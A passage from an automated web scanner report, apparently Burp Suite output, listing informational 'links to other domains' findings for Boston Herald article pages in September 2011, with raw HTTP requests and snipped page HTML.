<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
</div>

   
<object id="flashObj" width="408" height="276" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0"><param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="@videoPlayer=1142222053001&playerID=84359688001&playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9&domain=embed&dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="408" height="276" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
<a href="/news/national/remembering_911/view/2011_0912headlinegoes/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/4a7638_090911newyorkce019.jpg" alt="&#x2018;MY ANGEL&#x2019;: New York City resident Charlie Wolf talks about his late wife, Katherine, who was killed on Sept. 11, 2001, when terrorists flew planes into the World Trade Center."></a>
...[SNIP]...
<a href="/news/national/remembering_911/view/2011_0912tears_gratitude_for_hero_mom/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/be86cd_091111anniveraryfn15.jpg" alt="GRIEF: Danielle and Carie Lemack, above, whose mother, Judy Larocque, was killed on Sept. 11, 2001, embrace during a State House memorial service yesterday. "></a>
...[SNIP]...
<a href="/news/national/remembering_911/view/2011_0911it_should_be_easier_after_10_years/"><img src="http://multimedia.heraldinteractive.com/images/20110910/stp/8c4bb9_091011newyorkce002.jpg" alt="NO TIME TO SAY GOODBYE: Retired Brookline firefighter Jack Dewan holds the memorial card for his brother, New York firefighter Gerard P. Dewan, who was killed at the World Trade Center in the 9/11 terrorist attacks."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/national/remembering_911/view/2011_0911it_should_be_easier_after_10_years/srvc=rem911&position=">
...[SNIP]...
<a href="/news/national/remembering_911/view/2011_0911a_reminder_of_how_lucky_we_are/"><img src="http://multimedia.heraldinteractive.com/images/20110910/stp/270bd9_Casey_09102011.jpg" alt="BUNDLE OF HOPE: WBZ-TV anchor Lisa Hughes, husband Michael Casey and their daughter Riley, 10, frolic with newly adopted Dylan. Mike Casey&#x2019;s first wife, Neilie Casey, was killed on Sept. 11, 2001."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/national/remembering_911/view/2011_0911a_reminder_of_how_lucky_we_are/srvc=rem911&position=">
...[SNIP]...
<a href="/news/national/remembering_911/view/2011_0911daughter_lost_couple_is_warmed_by_kindess/"><img src="http://multimedia.heraldinteractive.com/images/20110910/stp/37737d_090811grodbergsDR001.jpg" alt="FIRESIDE: Bob and Dottie Grodberg chat with chef Jim Solomon at the Fireplace."></a>
...[SNIP]...
<a href="/news/national/remembering_911/view/2011_0911today_we_are_all_patriots_krafts_post-911_words__rang_true/"><img src="http://multimedia.heraldinteractive.com/images/20110910/stp/5a37cb_030907kraft.jpg" alt="HEROES: In a moment Robert Kraft says he&#x2019;ll never forget, then-Patriots offensive guard Joe Andruzzi&#x2019;s three firefighter brothers, above, wave to the crowd at Foxboro Stadium 12 days after the Sept. 11, 2001, terrorist attacks."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/national/remembering_911/view/2011_0911today_we_are_all_patriots_krafts_post-911_words__rang_true/srvc=rem911&position=">
...[SNIP]...
<a href="/news/national/remembering_911/view/20110911names_911_attack_victims_ring_out_at_wtc_site/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/2f9a35_water.jpg" alt="Friends and family members of 9/11 victims visit a September 11 Memorial waterfall during a ceremony marking the 10th anniversary of the attacks, Sunday, in New York. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/national/remembering_911/view/20110911names_911_attack_victims_ring_out_at_wtc_site/srvc=rem911&position=">
...[SNIP]...
<a href="/news/national/remembering_911/view/2011_0911mckelvie_well-spoken_on_sept11/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/8dd1b5_McKelvie_09112011.jpg" alt="Zach McKelvie"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/national/remembering_911/view/2011_0911mckelvie_well-spoken_on_sept11/srvc=rem911&position=">
...[SNIP]...
<a href="/news/national/remembering_911/view/20110911scenes_from_the_911_anniversary/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/069dea_parez.jpg" alt="Robert Peraza, who lost his son Robert David Peraza in the attacks at the World Trade Center, pauses at his son&rsquo;s name at the North Pool of the 9/11 Memorial before the 10th anniversary ceremony at the site, Sunday, in New York. "></a>
...[SNIP]...
<a href="/news/national/remembering_911/view/20110911911_is_marked_worldwide_with_reflection_prayers/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/886297_siva.jpg" alt="In this photo taken Friday, Paramsothy Sivapakiam, 60, father of the 9/11 terrorist attacks victim Vijayashanker Paramsothy, looks at a photo of him and his late son during an interview in Petaling Jaya, near Kuala Lumpur, Malaysia. "></a>
...[SNIP]...
<a href="/news/national/remembering_911/view/20110911times_journalist_recalls_haunting_911_phone_call/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/d711d8_meltz.jpg" alt="Zachary Meltzer, with his grandchildren, Sam and Abigail, 3, and Max, 6, right. After the 9/11 attacks, Meltzer moved from Centerville to Long Island, N.Y., to be closer to his grandchildren."></a>
...[SNIP]...
<a href="/news/national/remembering_911/view/20110911bush_and_obama_at_ground_zero_to_mark_sept_11/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/d31fa1_man.jpg" alt="A man examines some of the names on the wall of the south pool at the Sept. 11 memorial as the public gathered to mark the 10th anniversary of the terrorist attacks on the World Trade Center, Sunday, in New York."></a>
...[SNIP]...
<a href="/news/national/remembering_911/view/20110911yo-yo_ma_james_taylor_and_paul_simon_play_at_sept_11_anniversary/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/ba622d_JT_09112011.jpg" alt="James Taylor performs during a ceremony to mark the 10th anniversary of the Sept. 11 attacks at the site of the World Trade Center this morning in New York."></a>
...[SNIP]...
<a href="/news/national/remembering_911/view/20110911unease_and_confidence_among_travelers_on_911/"><img src="http://multimedia.heraldinteractive.com/images/20110911/stp/445c54_walt.jpg" alt="American Airlines ticket agent Vita Ahrens, left, and passenger Chris Walton, of Falmouth, Mass., observe a moment of silence at 8:46 a.m. at Logan International Airport in Boston, Sunday."></a>
...[SNIP]...
<!--//include 8 //-->


<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://jobsearch.local-jobs.monster.com/Search.aspx?wt.mc_n=hjnpsearch&ch=bostonherald&q=&where=Boston&re=130&cy=us&brd=1">Find Boston Jobs</a>
...[SNIP]...
<h2><a href="http://bostonherald.loveaccess.com/">Personals</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.41. http://bostonherald.com/news/regional/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/regional/view.bg?articleid=1366356&position=1 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
<!-- // END Facebook OpenGraph API //-->


<link rel="alternate" title="Local Coverage - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/regional/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F2011_0916suspect_in_woburn_cop_shooting_held_on_500k_bail%2Fsrvc%3Dhome%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1366356&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1366356&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1366356&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(42) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Woburn cop in botched heist had finger shot off');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0; top: 2px;"/>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1366356&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(42) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110916/72a9b2_ltp091611arraignmenttf01.jpg" alt="Hector Barz-Cruz leaves Woburn..." /></div>
...[SNIP]...
<div id="embedDiv">


<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://jobsearch.local-jobs.monster.com/Search.aspx?wt.mc_n=hjnpsearch&ch=bostonherald&q=&where=Boston&re=130&cy=us&brd=1">Find Boston Jobs</a>
...[SNIP]...
<h2><a href="http://bostonherald.loveaccess.com/">Personals</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.42. http://bostonherald.com/news/regional/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/regional/view.bg?articleid=1366356&position=1 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
<!-- // END Facebook OpenGraph API //-->


<link rel="alternate" title="Local Coverage - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/regional/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1366356&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1366356&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1366356&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(42) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Woburn cop in botched heist had finger shot off');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0; top: 2px;"/>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1366356&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(42) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110916/72a9b2_ltp091611arraignmenttf01.jpg" alt="Hector Barz-Cruz leaves Woburn..." /></div>
...[SNIP]...
<div id="embedDiv">


<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://jobsearch.local-jobs.monster.com/Search.aspx?wt.mc_n=hjnpsearch&ch=bostonherald&q=&where=Boston&re=130&cy=us&brd=1">Find Boston Jobs</a>
...[SNIP]...
<h2><a href="http://bostonherald.loveaccess.com/">Personals</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
